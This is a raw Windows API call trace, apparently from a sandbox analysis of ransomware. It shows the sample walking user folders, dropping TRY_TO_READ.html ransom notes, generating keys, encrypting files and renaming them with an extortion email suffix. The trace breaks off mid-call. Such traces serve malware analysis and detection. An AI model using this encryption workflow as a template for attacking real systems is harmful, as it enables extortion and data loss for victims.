[0121.411] GetProcessHeap () returned 0x410000 [0121.411] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.411] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xba42fae0, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xd99e18c0, ftLastAccessTime.dwHighDateTime=0x1d5dfb1, ftLastWriteTime.dwLowDateTime=0xd99e18c0, ftLastWriteTime.dwHighDateTime=0x1d5dfb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qYRyxaUemy3DT_vhh2gj", cAlternateFileName="QYRYXA~1")) returned 1 [0121.411] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qYRyxaUemy3DT_vhh2gj\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qyryxauemy3dt_vhh2gj\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0121.414] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328868d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328868d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51921690, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.414] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f2dc340, ftCreationTime.dwHighDateTime=0x1d5e3bc, ftLastAccessTime.dwLowDateTime=0xc89fc6b0, ftLastAccessTime.dwHighDateTime=0x1d5e4dc, ftLastWriteTime.dwLowDateTime=0xc89fc6b0, ftLastWriteTime.dwHighDateTime=0x1d5e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x3f7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xT2DpZlU.m4a", cAlternateFileName="")) returned 1 [0121.414] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xt2dpzlu.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b8 [0121.414] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.414] LockFile (hFile=0x4b8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x3f7d, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.414] SetFilePointerEx (in: hFile=0x4b8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.414] ReadFile (in: hFile=0x4b8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.415] SetFilePointerEx (in: hFile=0x4b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.415] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.415] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x473050 | out: pbBuffer=0x473050) returned 1 [0121.415] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.415] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a", dwFileAttributes=0x80) returned 1 [0121.415] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a") returned 49 [0121.415] GetProcessHeap () returned 0x410000 [0121.415] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x44faf8 [0121.415] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a" [0121.415] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.415] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16253) returned 1 [0121.415] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x3f7d [0121.416] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.416] GetProcessHeap () returned 0x410000 [0121.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473158 [0121.416] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473158*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473158*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.417] WriteFile (in: hFile=0x4b8, lpBuffer=0x473158*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473158*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.420] WriteFile (in: hFile=0x4b8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.421] WriteFile (in: hFile=0x4b8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3f7d) returned 0x4dab68 [0121.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3f7d) returned 0x4deaf0 [0121.422] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.422] ReadFile (in: hFile=0x4b8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x3f7d, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x3f7d, lpOverlapped=0x0) returned 1 [0121.423] UnlockFile (hFile=0x4b8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x3f7d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.423] CloseHandle (hObject=0x4b8) returned 1 [0121.424] GetProcessHeap () returned 0x410000 [0121.424] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473158 | out: hHeap=0x410000) returned 1 [0121.424] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xt2dpzlu.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xT2DpZlU.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xt2dpzlu.m4a.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.426] GetProcessHeap () returned 0x410000 [0121.426] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.426] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe84d6440, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x19536750, ftLastAccessTime.dwHighDateTime=0x1d5e6f5, ftLastWriteTime.dwLowDateTime=0x19536750, ftLastWriteTime.dwHighDateTime=0x1d5e6f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zf3A", cAlternateFileName="")) returned 1 [0121.426] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Zf3A\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zf3a\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0121.427] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bd608d0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0xd6a6d050, ftLastAccessTime.dwHighDateTime=0x1d5d8e3, ftLastWriteTime.dwLowDateTime=0xd6a6d050, ftLastWriteTime.dwHighDateTime=0x1d5d8e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zvBh", cAlternateFileName="")) returned 1 [0121.428] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zvBh\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zvbh\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0121.429] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bd608d0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0xd6a6d050, ftLastAccessTime.dwHighDateTime=0x1d5d8e3, ftLastWriteTime.dwLowDateTime=0xd6a6d050, ftLastWriteTime.dwHighDateTime=0x1d5d8e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zvBh", cAlternateFileName="")) returned 0 [0121.429] CloseHandle (hObject=0x3cc) returned 1 [0121.430] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.430] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x324)) [0121.430] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.430] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.430] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.430] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents9c354ca09c354b444c.lock") returned 66 [0121.430] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.431] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.431] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.431] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0121.431] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bd608d0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0xd6a6d050, ftLastAccessTime.dwHighDateTime=0x1d5d8e3, ftLastWriteTime.dwLowDateTime=0xd6a6d050, ftLastWriteTime.dwHighDateTime=0x1d5d8e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zvBh", cAlternateFileName="")) returned 0xffffffff [0121.431] CloseHandle (hObject=0x3cc) returned 1 [0121.434] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.435] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x333)) [0121.435] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.435] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.435] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.435] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood9c354ca09c354b444c.lock") returned 61 [0121.435] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.435] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.436] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b18e0 [0121.436] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bd608d0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0xd6a6d050, ftLastAccessTime.dwHighDateTime=0x1d5d8e3, ftLastWriteTime.dwLowDateTime=0xd6a6d050, ftLastWriteTime.dwHighDateTime=0x1d5d8e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zvBh", cAlternateFileName="")) returned 0xffffffff [0121.436] CloseHandle (hObject=0x3cc) returned 1 [0121.436] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.436] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x333)) [0121.436] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.437] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.437] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.437] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures9c354ca09c354b444c.lock") returned 62 [0121.437] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.437] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.437] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.438] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0121.438] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328aca30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328aca30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ef30 [0121.438] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328aca30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328aca30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.438] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f8e4350, ftCreationTime.dwHighDateTime=0x1d5de4b, ftLastAccessTime.dwLowDateTime=0x173d7f80, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x173d7f80, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1GAsL8IHKX", cAlternateFileName="1GASL8~1")) returned 1 [0121.438] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1GAsL8IHKX\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1gasl8ihkx\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0121.439] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf34a2690, ftCreationTime.dwHighDateTime=0x1d5df6d, ftLastAccessTime.dwLowDateTime=0xeac21a70, ftLastAccessTime.dwHighDateTime=0x1d5e47a, ftLastWriteTime.dwLowDateTime=0xeac21a70, ftLastWriteTime.dwHighDateTime=0x1d5e47a, nFileSizeHigh=0x0, nFileSizeLow=0x31a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4urgQfY.gif", cAlternateFileName="")) returned 1 [0121.439] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4urgqfy.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4bc [0121.439] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.439] LockFile (hFile=0x4bc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x31a0, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.439] SetFilePointerEx (in: hFile=0x4bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.440] ReadFile (in: hFile=0x4bc, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.440] SetFilePointerEx (in: hFile=0x4bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.440] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.440] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.440] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.440] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif", dwFileAttributes=0x80) returned 1 [0121.441] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif") returned 51 [0121.441] GetProcessHeap () returned 0x410000 [0121.441] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x44faf8 [0121.441] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif" [0121.441] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.441] GetFileSizeEx (in: hFile=0x4bc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=12704) returned 1 [0121.441] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x31a0 [0121.441] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.441] GetProcessHeap () returned 0x410000 [0121.441] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.441] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.441] WriteFile (in: hFile=0x4bc, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.444] WriteFile (in: hFile=0x4bc, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.461] WriteFile (in: hFile=0x4bc, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.462] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x31a0) returned 0x4dbb68 [0121.462] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x31a0) returned 0x4ded10 [0121.462] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.462] ReadFile (in: hFile=0x4bc, lpBuffer=0x4dbb68, nNumberOfBytesToRead=0x31a0, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dbb68*, lpNumberOfBytesRead=0x367f44c*=0x31a0, lpOverlapped=0x0) returned 1 [0121.462] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=-12704, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.462] WriteFile (in: hFile=0x4bc, lpBuffer=0x4ded10*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4ded10*, lpNumberOfBytesWritten=0x367f44c*=0x31a0, lpOverlapped=0x0) returned 1 [0121.464] UnlockFile (hFile=0x4bc, dwFileOffsetLow=0x0, 